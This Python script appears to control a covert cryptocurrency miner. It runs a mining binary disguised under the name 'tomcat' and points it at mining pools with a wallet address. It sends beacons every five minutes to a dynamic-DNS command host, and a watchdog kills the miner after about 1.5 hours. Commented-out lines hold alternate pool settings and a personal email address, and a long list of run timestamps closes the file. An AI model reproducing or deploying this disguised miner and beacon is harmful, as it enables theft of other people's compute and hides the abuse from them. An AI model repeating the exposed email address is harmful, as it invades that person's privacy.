import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:03.982131
#2018-02-17 17:23:03.888363
#2018-02-17 19:12:05.118884
#2018-02-17 21:02:05.335100
#2018-02-17 22:47:01.761173
#2018-02-18 00:31:04.410128
#2018-02-18 02:21:06.636411
#2018-02-18 04:08:01.424957
#2018-02-18 05:59:04.557251
#2018-02-18 07:49:06.504000
#2018-02-18 09:37:06.472460
#2018-02-18 11:23:04.062347
#2018-02-18 13:09:05.194303
#2018-02-18 14:57:06.699050
#2018-02-18 16:46:06.926457
#2018-02-18 18:34:05.562913
#2018-02-18 20:21:07.029104
#2018-02-18 22:07:05.037141
#2018-02-18 23:56:04.210076
#2018-02-19 01:42:05.132079
#2018-02-19 03:30:09.322101
#2018-02-19 05:14:07.005895
#2018-02-19 07:01:05.395500
#2018-02-19 08:49:06.383060
#2018-02-19 10:39:04.022688
#2018-02-19 12:26:01.364465
#2018-02-19 14:13:04.249888
#2018-02-19 16:02:06.808798
#2018-02-19 17:49:07.781684
#2018-02-19 19:37:01.720631
#2018-02-19 21:24:06.045427
#2018-02-19 23:10:01.365891
#2018-02-20 00:55:06.999466
#2018-02-20 02:44:01.764162
#2018-02-20 04:33:05.723898
#2018-02-20 06:17:06.200029
#2018-02-20 08:02:08.073139
#2018-02-20 09:49:05.810172
#2018-02-20 11:33:04.610014
#2018-02-20 13:19:08.433977
#2018-02-20 15:06:01.595395
#2018-02-20 16:50:08.065257
#2018-02-20 18:39:03.940643
#2018-02-20 20:29:01.583551
#2018-02-20 22:14:04.727790
#2018-02-20 23:55:05.800169
#2018-02-21 01:39:05.438300
#2018-02-21 03:26:08.218702
#2018-02-21 05:15:09.566560
#2018-02-21 07:05:07.169683
#2018-02-21 08:50:06.825082
#2018-02-21 10:37:06.021489
#2018-02-21 12:25:04.972598
#2018-02-21 14:11:06.111268
#2018-02-21 15:58:10.136562
#2018-02-21 17:49:08.533377
#2018-02-21 19:35:04.748668
#2018-02-21 21:22:04.725568
#2018-02-21 23:08:02.955326
#2018-02-22 01:01:02.234177
#2018-02-22 02:50:09.241692
#2018-02-22 04:36:08.212808
#2018-02-22 06:21:02.043621
#2018-02-22 08:08:06.552771
#2018-02-22 09:56:05.238144
#2018-02-22 11:41:08.189617
#2018-02-22 13:28:04.218337
#2018-02-22 15:17:06.559842
#2018-02-22 17:03:08.023741
#2018-02-22 18:51:07.329278
#2018-02-22 20:43:08.504553
#2018-02-22 22:29:06.501952
#2018-02-23 00:15:01.503147
#2018-02-23 02:03:08.826522
#2018-02-23 03:51:08.755049
#2018-02-23 05:34:07.010132
#2018-02-23 07:20:04.557884
#2018-02-23 09:24:04.212540
#2018-02-23 11:29:07.798528
#2018-02-23 13:20:03.929114
#2018-02-23 15:06:05.924885
#2018-02-23 16:54:01.726744
#2018-02-23 18:42:01.934645
#2018-02-23 20:29:07.626500
#2018-02-23 22:16:08.702937
#2018-02-24 00:02:06.498527
#2018-02-24 01:51:04.238554
#2018-02-24 03:41:07.754381
#2018-02-24 05:24:07.592755
#2018-02-24 07:12:05.270071
#2018-02-24 09:02:07.624921
#2018-02-24 10:58:07.246328
#2018-02-24 12:48:04.200144
#2018-02-24 14:37:01.208638
#2018-02-24 16:23:05.228359
#2018-02-24 18:17:01.435573
#2018-02-24 20:04:03.804267
#2018-02-24 21:47:05.357922
#2018-02-25 00:48:04.706589
#2018-02-25 03:49:07.072080
#2018-02-25 06:36:06.703509
#2018-02-25 11:36:07.422475
#2018-02-25 13:48:01.348631
#2018-02-25 15:22:01.516246